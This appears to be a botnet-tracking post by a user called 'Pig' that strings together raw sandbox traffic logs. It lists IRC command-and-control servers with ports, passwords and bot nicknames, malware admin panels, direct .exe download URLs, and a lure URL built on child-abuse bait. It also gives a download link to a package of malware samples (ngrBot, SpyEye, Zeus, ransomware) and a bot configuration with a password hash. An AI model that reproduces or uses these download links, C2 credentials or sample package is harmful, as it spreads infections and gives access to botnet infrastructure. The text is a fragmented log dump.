Author: Pig

– DNS Queries: envc.machcar.kr DNS_TYPE_A 222.24.94.15 vhosts.packmanbd.com DNS_TYPE_A 222.24.94.19 222.24.94.19 – HTTP Conversations: 222.24.94.15:80 – [envc.machcar.kr] Request: POST /envc.php Response: 200 “OK” 222.24.94.19:80 – [vhosts.packmanbd.com] Request: GET /manual/vhosts.txt Response: 200 “OK” Url used to infect people: http://pedofilia.warbe.org/id/noticias/g1.globo.com/pedofilia/2011/0-19384pastor-e-filmado-fazendo-sexo-oral-com-adolescente.php?0.82545 Direct download: http://pedofilia.warbe.org/id/noticias/g1.globo.com/pedofilia/2011/videos-pedofilia-1039-pastor-fazendo-sexo-oral-com-adolescente-AVI.exe Hosting infos: http://whois.domaintools.com/122.160.131.225

Remote Host Port Number ssh.mytijn.org 8782 PASS weed NICK {iNF-00-USA-XP-COMP-1493} USER blaze * 0 :COMP NICK {00-USA-XP-COMP-6216} hosting infos: http://whois.domaintools.com/117.211.84.155

HTTP Malware from Russia used to ddos Admin Panel: http://area.myarena.ru/ex/adm/auth.php – DNS Queries: area.myarena.ru DNS_TYPE_A 62.122.213.10 http://palmary73.net DNS_TYPE_A – HTTP Conversations: 62.122.213.10:80 – [area.myarena.ru] Request: GET /ex/?uid=035409&ver=9aXPA Response: 200 “OK” Request: GET /ex/adm/?uid=035409&ver=9aXPA Response: 302 “Found” Request: GET /ex/adm/auth.php Response: 200 “OK” Request: GET /ex/adm/index.php?uid=035409&ver=9aXPA Response: 302 “Found” Request: GET /ex/adm/auth.php Response: 200 “OK” ExeRead more...

Remote Host Port Number 178.211.58.11 2525 NICK {ORG-XP-USA}756551 USER 7565 “” “TsGh” :7565 JOIN ##Kuzen bla PONG :irc.clupversai.com Now talking in ##Kuzen Topic On: [ ##Kuzen ] [ ] Topic By: [ OrgeneraL ] hosting infos: http://whois.domaintools.com/178.211.58.11

safetysamvps.info:6667 Resolved : [safetysamvps.info] To [216.24.203.254] EXE FILE: http://fanaras.gr/up/catroot.exe if someone find more infos about this botnet post them here hosting infos: http://whois.domaintools.com/216.24.203.254

Remote Host Port Number 213.251.170.52 80 91.211.117.153 80 91.211.117.155 1865 PASS ngrBot NICK n{US|XPa}rwslldg USER rwslldg 0 0 :rwslldg JOIN #main 4m3r1k4 QUIT :rebooting * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://91.211.117.153/070711.exe hosting infos: http://whois.domaintools.com/91.211.117.155

Remote Host Port Number 199.15.234.7 80 92.241.164.229 7654 PASS ngrBot NICK n{US|XPa}iyhylyn USER iyhylyn 0 0 :iyhylyn JOIN #oldgold noKIDs JOIN #US hosting infos: http://whois.domaintools.com/92.241.164.229

ngrBot,spyeye,zeus,ransomware and more malware samples inside this package Download: http://adf.ly/21FL5

Remote Host Port Number goim.hoodrich.ru 4042 PASS google_cache2.tmp NICK [USA|XP]698545 USER 6985 “” “TsGh” :6985 JOIN #newbiz# abc NICK n[USA|XP]576351 USER 5763 “” “TsGh” :5763 NICK [USA|XP]626543 USER 6265 “” “TsGh” :6265 hosting infos: http://whois.domaintools.com/216.131.127.13

Resolved : [gangbang.angels-agency.nl] To [223.244.227.2] Resolved : [gangbang.angels-agency.nl] To [117.211.84.155] UPDATE: Resolved : [ gangbang.angels-agency.nl ] To [ 78.47.59.194 ] Resolved : [ gangbang.angels-agency.nl ] To [ 223.244.227.2 ] Resolved : [ gangbang.angels-agency.nl ] To [ 117.211.84.155 ] var $config = array(“server”=>”gangbang.angels-agency.nl”, “port”=>”25343”, “pass”=>””, “maxrand”=>”1”, “chan”=>”#wWw#”, “chan2″=>”#wWw#”, “key”=>”scan”, “modes”=>”+p”, “password”=>”41aa15390e2efa34ac693c3bd7cb8e88”,//p0w3r “trigger”=>”.”, “hostauth”=>”0wn3d.3u” hosting infos: http://whois.domaintools.com/223.244.227.2